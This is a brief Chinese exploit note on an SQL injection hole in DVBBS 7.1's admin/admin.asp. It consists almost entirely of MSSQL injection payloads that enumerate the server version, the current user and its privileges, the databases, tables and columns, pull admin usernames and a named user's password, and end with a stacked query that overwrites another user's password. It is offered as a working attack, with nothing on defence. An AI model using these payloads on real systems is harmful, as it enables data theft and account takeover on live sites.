漏洞测试环境:DVBBS7.1SQL

受影响文件

admin/admin.asp

.....

漏洞利用

(select@@version)>0获得Windows的版本号

anduser_name()='dbo'判断当前系统的连接用户是不是sa

(selectuser_name())>0爆当前系统的连接用户

(selectdb_name())>0得到当前连接的数据库

(selectIS_MEMBER('db_owner'))--查询数据库当前用户权限

(selectcount(*)frommaster.dbo.sysdatabaseswherename>1anddbid=7)---查询所有数据库名

(selecttop1namefromJxSoufun.dbo.sysobjectswherextype='U')--查询数据库表名

(selecttop1namefromJxSoufun.dbo.sysobjectswherextype='U'andnamenotin('web_Admin'))--查询数据库所有表名

(selectcount(*)fromJxSoufun.dbo.sysobjectswherextype='U'andname='web_Admin'anduid>(str(id)))--查询表名ID

(selecttop1namefromJxSoufun.dbo.syscolumnswhereid=1125579048)--查询字段名

(selecttop1namefromJxSoufun.dbo.syscolumnswhereid=1125579048andnamenotin('adminname'))--查询所有字段名

(selectcount(*)fromJxSoufun.dbo.web_AdminwhereAdminName>1)-查询用户

(selectcount(*)fromJxSoufun.dbo.web_AdminwhereAdminpwd>1andusername='bluefire')-查询用户bluefire密码

;updateJxSoufun.dbo.Agency_Usersetuserpwd='965eb72c92a549dd'whereusername='mthfc';--